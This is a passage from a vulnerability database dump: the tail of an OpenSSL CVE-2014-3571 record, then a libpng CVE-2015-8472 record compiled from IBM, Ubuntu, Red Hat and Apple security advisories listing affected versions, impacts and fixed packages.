"https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.2, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3571" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=39946" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5432" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5433" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0118" }, { "trust": 0.1, "url": "https://www.frida.re" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204658" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6438" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3487" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3670" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0238" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2497" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3587" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3669" }, { "trust": 0.1, "url": "https://support.apple.com/en-" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0098" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3538" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0117" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3480" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3668" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0207" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5704" }, { "trust": 0.1, "url": "http://dtorres.me)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3479" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3478" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6712" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2459-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu9.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.23" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.8" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "BID", "id": "71937" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "129880" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130548" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "BID", "id": "71937" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "129880" }, { "db": "PACKETSTORM", "id": "131359" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130548" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2014-3571" }, { "date": "2014-10-22T00:00:00", "db": "BID", "id": "71937" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "date": "2015-08-26T01:33:18", "db": "PACKETSTORM", "id": "133317" }, { "date": "2015-01-12T17:17:37", "db": "PACKETSTORM", "id": "129880" }, { "date": "2015-04-09T16:30:50", "db": "PACKETSTORM", "id": "131359" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-01-12T21:48:37", "db": "PACKETSTORM", "id": "129893" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2015-02-26T17:13:45", "db": "PACKETSTORM", "id": "130548" }, { "date": "2015-02-26T17:13:09", "db": "PACKETSTORM", "id": "130545" }, { "date": "2015-01-09T02:59:01.287000", "db": "NVD", "id": "CVE-2014-3571" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-10-20T00:00:00", "db": "VULMON", "id": "CVE-2014-3571" }, { "date": "2017-05-02T04:07:00", "db": "BID", "id": "71937" }, { "date": "2016-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "date": "2017-10-20T01:29:03.410000", "db": "NVD", "id": "CVE-2014-3571" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "71937" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007552" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "71937" } ], "trust": 0.3 } }
var-201601-0495
Vulnerability from variot
Buffer overflow in the png_set_PLTE function in libpng before 1.0.65, 1.1.x and 1.2.x before 1.2.55, 1.3.x, 1.4.x before 1.4.18, 1.5.x before 1.5.25, and 1.6.x before 1.6.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-8126. libpng of png_set_PLTE The function contains a buffer overflow vulnerability. The following versions are affected: libpng prior to 1.0.65, 1.1.x and 1.2.x prior to 1.2.55, 1.3.x, 1.4.x prior to 1.4.18, 1.5.x prior to 1.5.25, 1.6 1.6.x versions prior to .20. 5) - i386, ppc, s390x, x86_64
- Description:
IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Further information about these flaws can be found on the IBM Java Security alerts page, listed in the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494)
Note: This update also disallows the use of the MD5 hash algorithm in the certification path processing. The use of MD5 can be re-enabled by removing MD5 from the jdk.certpath.disabledAlgorithms security property defined in the java.security file. All running instances of IBM Java must be restarted for the update to take effect. Bugs fixed (https://bugzilla.redhat.com/):
1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123 1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions 1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH) 1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword() 1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543) 1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054) 1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710) 1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962) 1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017) 1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods
- ============================================================================ Ubuntu Security Notice USN-2861-1 January 06, 2016
libpng vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
libpng could be made to crash or run programs as your login if it opened a specially crafted file. (CVE-2015-8472)
Qixue Xiao and Chen Yu discovered that libpng incorrectly handled certain malformed images. (CVE-2015-8540)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libpng12-0 1.2.51-0ubuntu3.15.10.2
Ubuntu 15.04: libpng12-0 1.2.51-0ubuntu3.15.04.2
Ubuntu 14.04 LTS: libpng12-0 1.2.50-1ubuntu2.14.04.2
Ubuntu 12.04 LTS: libpng12-0 1.2.46-3ubuntu4.2
After a standard system update you need to restart your session to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libpng12 security update Advisory ID: RHSA-2015:2595-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2595.html Issue date: 2015-12-09 CVE Names: CVE-2015-7981 CVE-2015-8126 CVE-2015-8472 =====================================================================
- Summary:
Updated libpng12 packages that fix three security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libpng12 packages contain a library of functions for creating and manipulating PNG (Portable Network Graphics) image format files.
It was discovered that the png_get_PLTE() and png_set_PLTE() functions of libpng did not correctly calculate the maximum palette sizes for bit depths of less than 8. In case an application tried to use these functions in combination with properly calculated palette sizes, this could lead to a buffer overflow or out-of-bounds reads. An attacker could exploit this to cause a crash or potentially execute arbitrary code by tricking an unsuspecting user into processing a specially crafted PNG image. However, the exact impact is dependent on the application using the library. An attacker could possibly use this flaw to cause an out-of-bounds read by tricking an unsuspecting user into processing a specially crafted PNG image. (CVE-2015-7981)
All libpng12 users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libpng12-1.2.50-7.el7_2.src.rpm
x86_64: libpng12-1.2.50-7.el7_2.i686.rpm libpng12-1.2.50-7.el7_2.x86_64.rpm libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm libpng12-devel-1.2.50-7.el7_2.i686.rpm libpng12-devel-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libpng12-1.2.50-7.el7_2.src.rpm
x86_64: libpng12-1.2.50-7.el7_2.i686.rpm libpng12-1.2.50-7.el7_2.x86_64.rpm libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm libpng12-devel-1.2.50-7.el7_2.i686.rpm libpng12-devel-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libpng12-1.2.50-7.el7_2.src.rpm
aarch64: libpng12-1.2.50-7.el7_2.aarch64.rpm libpng12-debuginfo-1.2.50-7.el7_2.aarch64.rpm
ppc64: libpng12-1.2.50-7.el7_2.ppc.rpm libpng12-1.2.50-7.el7_2.ppc64.rpm libpng12-debuginfo-1.2.50-7.el7_2.ppc.rpm libpng12-debuginfo-1.2.50-7.el7_2.ppc64.rpm
ppc64le: libpng12-1.2.50-7.el7_2.ppc64le.rpm libpng12-debuginfo-1.2.50-7.el7_2.ppc64le.rpm
s390x: libpng12-1.2.50-7.el7_2.s390.rpm libpng12-1.2.50-7.el7_2.s390x.rpm libpng12-debuginfo-1.2.50-7.el7_2.s390.rpm libpng12-debuginfo-1.2.50-7.el7_2.s390x.rpm
x86_64: libpng12-1.2.50-7.el7_2.i686.rpm libpng12-1.2.50-7.el7_2.x86_64.rpm libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: libpng12-debuginfo-1.2.50-7.el7_2.aarch64.rpm libpng12-devel-1.2.50-7.el7_2.aarch64.rpm
ppc64: libpng12-debuginfo-1.2.50-7.el7_2.ppc.rpm libpng12-debuginfo-1.2.50-7.el7_2.ppc64.rpm libpng12-devel-1.2.50-7.el7_2.ppc.rpm libpng12-devel-1.2.50-7.el7_2.ppc64.rpm
ppc64le: libpng12-debuginfo-1.2.50-7.el7_2.ppc64le.rpm libpng12-devel-1.2.50-7.el7_2.ppc64le.rpm
s390x: libpng12-debuginfo-1.2.50-7.el7_2.s390.rpm libpng12-debuginfo-1.2.50-7.el7_2.s390x.rpm libpng12-devel-1.2.50-7.el7_2.s390.rpm libpng12-devel-1.2.50-7.el7_2.s390x.rpm
x86_64: libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm libpng12-devel-1.2.50-7.el7_2.i686.rpm libpng12-devel-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libpng12-1.2.50-7.el7_2.src.rpm
x86_64: libpng12-1.2.50-7.el7_2.i686.rpm libpng12-1.2.50-7.el7_2.x86_64.rpm libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libpng12-debuginfo-1.2.50-7.el7_2.i686.rpm libpng12-debuginfo-1.2.50-7.el7_2.x86_64.rpm libpng12-devel-1.2.50-7.el7_2.i686.rpm libpng12-devel-1.2.50-7.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-7981 https://access.redhat.com/security/cve/CVE-2015-8126 https://access.redhat.com/security/cve/CVE-2015-8472 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD4DBQFWaEOWXlSAg2UNWIIRArqQAJiXHpRTjePlByUwb2yeLtnA6ZHDAJ483rVP N/LWwsGEwId3XWZYVPOUSQ== =s2GT -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805, CVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842, CVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872, CVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903, CVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494, CVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427, CVE-2016-3443, CVE-2016-3449)
Red Hat would like to thank Andrea Palazzo of Truel IT for reporting the CVE-2015-4806 issue. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. This issue was addressed with improved validation. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
